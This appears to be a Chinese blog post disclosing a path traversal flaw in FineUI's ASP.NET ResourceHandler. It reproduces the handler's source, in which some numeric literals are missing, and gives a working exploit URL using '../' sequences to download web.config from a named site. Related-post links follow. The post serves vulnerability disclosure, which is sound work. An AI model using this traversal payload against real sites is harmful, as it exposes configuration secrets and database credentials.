注:屏蔽本漏洞的紧急通知:http://fineui.com/bbs/forum.php?mod=viewthread&tid=7863

本人小学文化,文采不好,写的不好请各位多多包含,

    最近笔者喜欢研究一些代码安全方面的问题,前些日子研究了下力软的框架,发现代码安全方面做的还是不足的,今天偶尔的机会接触了下fineui,从最开始的注入开始,都没有什么突破,

最好就想到列别的排序,从列别排序注入,弄了好久,发现一直没注入成功也没有报错,我就很是奇怪,然后看了下fineui的开源版,看了代码,发现原来他是判断的 ,不是拼接的,难怪注入失败,

本来以为没什么办法了,然后查看页面源码,发现一个引用引起了我的注意:

这个地址,于是去看了下他的源码

using System;

using System.Collections.Generic;

using System.Text;

using System.Web;

using System.Reflection;

using System.IO;

using System.Drawing.Imaging;

namespace FineUI

{

    /// <summary>

    /// 资源处理程序

    /// </summary>

    public class ResourceHandler : IHttpHandler

    {

        /// <summary>

        /// 处理资源的请求

        /// </summary>

        /// <param name="context">Http请求上下文</param>

        public void ProcessRequest(HttpContext context)

        {

            string type = String.Empty;

            string typeValue = String.Empty;

            string extjsBasePath = GlobalConfig.GetExtjsBasePath();

            //resName = "FineUI.";

            if (!String.IsNullOrEmpty(typeValue = context.Request.QueryString["icon"]))

            {

                type = "icon";

            }

            //else if (!String.IsNullOrEmpty(typeValue = context.Request.QueryString["js"]))

            //{

            //    type = "js";

            //    //resName += "js." + typeValue;

            //}

            //else if (!String.IsNullOrEmpty(typeValue = context.Request.QueryString["lang"]))

            //{

            //    type = "lang";

            //    //resName += "js.lang." + typeValue;

            //}

            else if (!String.IsNullOrEmpty(typeValue = context.Request.QueryString["theme"]))

            {

                // res.axd?theme=default.grid.refresh.gif

                type = "theme";

                //resName += "res.theme." + typeValue;

            }

            //else if (!String.IsNullOrEmpty(typeValue = context.Request.QueryString["css"]))

            //{

            //    type = "css";

            //    //resName += "res.css." + typeValue;

            //}

            else if (!String.IsNullOrEmpty(typeValue = context.Request.QueryString["img"]))

            {

                type = "img";

                //resName += "res.img." + typeValue;

            }

            else

            {

                context.Response.Write("Not supported!");

                return;

            }

            //byte[] binary;

            switch (type)

            {

                case "icon":

                    if (!typeValue.EndsWith(".png") && !typeValue.EndsWith(".gif"))

                    {

                        typeValue = IconHelper.GetName((Icon)Enum.Parse(typeof(Icon), typeValue));

                    }

                    //resName += "res.icon." + typeValue;

                    string serverPath = String.Format("{0}/{1}", GlobalConfig.GetIconBasePath(), typeValue);

                    context.Response.WriteFile(context.Server.MapPath(serverPath));

                    context.Response.ContentType = "image/" + GetImageFormat(typeValue);

                    break;

                //case "js":

                //    context.Response.Write(ResourceHelper.GetResourceContent(resName));

                //    context.Response.ContentType = "text/javascript";

                //case "lang":

                //    context.Response.Write(ResourceHelper.GetResourceContent(resName));

                //    context.Response.ContentType = "text/javascript";

                //    break;

                //case "css":

                //    context.Response.Write(ResourceHelper.GetResourceContent(resName));

                //    context.Response.ContentType = "text/css";

                //    break;

                case "theme":

                    string themePath = "";

                    string themeImageFormat = "";

                    int lastDotIndex = typeValue.LastIndexOf(".");

                    if (lastDotIndex >= )

                    {

                        themePath = typeValue.Substring(, lastDotIndex).Replace('.', '/');

                        themeImageFormat = typeValue.Substring(lastDotIndex + );

                    }

                    context.Response.WriteFile(context.Server.MapPath(String.Format("{0}/res/images/{1}.{2}", extjsBasePath, themePath, themeImageFormat)));

                    context.Response.ContentType = "image/" + GetImageFormat(typeValue);

                    break;

                case "img":

                    //binary = ResourceHelper.GetResourceContentAsBinary(resName);

                    //context.Response.OutputStream.Write(binary, 0, binary.Length);

                    //context.Response.ContentType = "image/" + GetImageFormat(resName);

                    context.Response.WriteFile(context.Server.MapPath(String.Format("{0}/res/images/{1}", extjsBasePath, typeValue)));

                    context.Response.ContentType = "image/" + GetImageFormat(typeValue);

                    break;

            }

            // 缓存一年,只能通过改变 URL 来强制更新缓存

            context.Response.Cache.SetExpires(DateTime.Now.AddYears());

            context.Response.Cache.SetCacheability(HttpCacheability.Public);

        }

        //private void RenderImage(HttpContext context, string resName)

        //{

        //    Assembly assembly = Assembly.GetExecutingAssembly();

        //    using (Stream stream = assembly.GetManifestResourceStream(resName))

        //    {

        //        using (System.Drawing.Image image = System.Drawing.Image.FromStream(stream))

        //        {

        //            // PNG输出时出现“GDI+ 中发生一般性错误”

        //            using (MemoryStream ms = new MemoryStream())

        //            {

        //                image.Save(ms, image.RawFormat);

        //                ms.WriteTo(context.Response.OutputStream);

        //                context.Response.ContentType = "image/" + GetImageFormat(image.RawFormat);

        //            }

        //        }

        //    }

        //}

        private string GetImageFormat(string imageName)

        {

            int lastDotIndex = imageName.LastIndexOf(".");

            if (lastDotIndex >= )

            {

                return imageName.Substring(lastDotIndex + );

            }

            return "png";

        }

        private string GetImageFormat(ImageFormat format)

        {

            if (format == ImageFormat.Bmp)

            {

                return "bmp";

            }

            else if (format == ImageFormat.Gif)

            {

                return "gif";

            }

            else if (format == ImageFormat.Jpeg)

            {

                return "jpeg";

            }

            else if (format == ImageFormat.Png)

            {

                return "png";

            }

            else if (format == ImageFormat.Tiff)

            {

                return "tiff";

            }

            else if (format == ImageFormat.Icon)

            {

                return "icon";

            }

            return "gif";

        }

        /// <summary>

        /// 只要请求的 URL 相同,则请求可以重用

        /// </summary>

        public bool IsReusable

        {

            get

            {

                return true;

            }

        }

    }

}

看了下,高兴啊。。太好了,不知道你们看出问题来了没有,

问题代码就在

  case "img":

                    //binary = ResourceHelper.GetResourceContentAsBinary(resName);

                    //context.Response.OutputStream.Write(binary, 0, binary.Length);

                    //context.Response.ContentType = "image/" + GetImageFormat(resName);

                    context.Response.WriteFile(context.Server.MapPath(String.Format("{0}/res/images/{1}", extjsBasePath, typeValue)));

                    context.Response.ContentType = "image/" + GetImageFormat(typeValue);

                    break;

大家都应该知道 我们引用js或者css的时候经常会有../ 这样的路径,其实很简单,就是上级目录,

我们就利用这个../  把作者写的/res/images/给去掉  也就是变成路径

/res/images/../../web.config

就这样我们就可以拿到web.config了,然后拼成完整的url:http://fineui.com/demo/res.axd?img=../../../../appboxpro/web.config&t=icon  浏览器输入

ok web.config就这样被拿下来了,,,当然,web.config都拿下了,其它也就都没什么可说的了,

今天就先到这吧。。。还得写文档,明天演示项目,注定又是一个无眠夜。。。

ASP.NET网站入侵第三波(fineui系统漏洞,可导致被拖库)的更多相关文章

  1. ASP.NET网站入侵第二波(LeaRun.信息化快速开发框架 已被笔者拿下)

    笔者小学文化,语言组织能力差,写的不通的地方请大家将就着看,不喜勿喷. 上篇我讲了如何在上传文件中入侵服务器,這次我们稍微多讲一点. 还是先讲下流程: 1.上传代码页面  我上传的是ashx页面. 2 ...

  2. 记一次ASP.NET网站的入侵和如何避免被入侵

    ASP.NET网站入侵第二波(LeaRun.信息化快速开发框架 已被笔者拿下) 详细介绍请看第二波 首先我要申明的是不是什么语言写出来的程序就不安全,而是得看写代码的人如何去写这个程序 前些日子我去客 ...

  3. 图文解说Win7系统机器上发布C#+ASP.NET网站

      1.     概述 在一台干净的Win7机器上发布ASP.NET网站需要准备的有: a)        .NET Framework 环境 b)        数据库 c)        IIS ...

  4. 在Windows系统搭建.NET Core环境并创建运行ASP.NET网站

    微软于6月27日在红帽DevNation峰会上 正式发布了.NET Core 1.0.ASP.NET 1.0和Entity Framework Core 1.0,其将全部支持Windows.OS X和 ...

  5. web安全普及:通俗易懂,如何让网站变得更安全?以实例来讲述网站入侵原理及防护。

    本篇以我自己的网站[http://www.1996v.com]为例来通俗易懂的讲述如何防止网站被入侵,如何让网站更安全. 要想足够安全,首先得知道其中的道理. 本文例子通俗易懂,从"破解网站 ...

  6. ASP.NET 开发必备知识点(1):如何让Asp.net网站运行在自定义的Web服务器上

    一.前言 大家都知道,在之前,我们Asp.net 的网站都只能部署在IIS上,并且IIS也只存在于Windows上,这样Asp.net开发的网站就难以做到跨平台.由于微软的各项技术的开源,所以微软自然 ...

  7. 搭建调用 WebService 的 ASP.NET 网站 (VS2010, C#)

    [系统环境]Windows 7 / 2008r2 [软件环境]Visual Studio 2010 [开发语言]C# [感谢]本文是在 <C#开发和调用Web Service> 一文的基础 ...

  8. 多年前写的一个ASP.NET网站管理系统,到现在有些公司在用

    多年前写的一个ASP.NET网站管理系统,到现在有些公司在用 今早上接到一个电话,自已多年前写的一个ASP.NET网站管理系统,一个公司在用,出了点问题, 第一点是惊奇,5,6年前的东东,手机号码换了 ...

  9. 64位Win7下运行ASP+Access网站的方法

    64位Win7下运行ASP+Access网站的方法 近日系统升级为WIN7 64位之后,突然发现原本运行正常的ASP+ACCESS网站无法正常连接数据库. 网上搜索多次,终于解决了问题,总结了几条经验 ...

随机推荐

  1. python简单爬虫定时推送同花顺直播及荐股至邮箱

    1.初衷:实践 2.技术:python requests Template 3.思路:根据直播页面获取评价最高的前十博主,定时爬行最新的消息和实战股票 4.思路:python 编辑简单邮件html模板 ...

  2. python基础(四)运算

    作者:Vamei 出处:http://www.cnblogs.com/vamei 欢迎转载,也请保留这段声明.谢谢! Python的运算符和其他语言类似 (我们暂时只了解这些运算符的基本用法,方便我们 ...

  3. 留念 C语言第一课简单的计算器制作

    留念 C语言第一课简单的计算器制作 学C语言这么久了.  /* 留念 C语言第一课简单的计算器制作 */   #include<stdio.h>  #include<stdlib.h ...

  4. 配置安装DVWA

    本文地址:http://www.cnblogs.com/go2bed/p/4162313.html —————————————————— 什么是DVWA? Damn Vulnerable Web Ap ...

  5. html之div拖拽,html5拖拽

    html之div拖拽 http://www.w3school.com.cn/html5/html_5_draganddrop.asp

  6. redis参数优化

    redis内存管理方式,支持tcmalloc,jemalloc,malloc三种内存分配,memcache使用slabs,malloc等内存分配方式. 简单点,就是redis,是边用边申请,使用现场申 ...

  7. 2016-2017 CT S03E07: Codeforces Trainings Season 3 Episode 7 - HackerEarth Problems Compilation

    B: 思路: 暴力,每两个判断一下; C: 思路: 容斥定理,先枚举脖子下面那个点和那个不可描述的点,算出所有的方案数,这里面有多的腿当成了脖子或者胳膊的,然后就再枚举这种情况把这些减去,又减多了; ...

  8. 在Flex4中嵌入字体

    如果要使用的字体不是系统字体,可以把字体嵌入到Flash中,然后引用该字体.不过字体文件一般都比较大,慎重使用该功能. 官方例子 http://help.adobe.com/en_US/flex/us ...

  9. windows 如何查看端口占用情况?

    原文来自:http://www.iteye.com/topic/1117270 开始--运行--cmd 进入命令提示符 输入netstat -ano 即可看到所有连接的PID 之后在任务管理器中找到这 ...

  10. jprofiler安装图解

    环境: 1.sun jdk1.6.0 2.jprofiler_windows_6_0_2.exe 安装 1. jdk, 安装略... 2. jprofiler安装 一路next 到Enter lice ...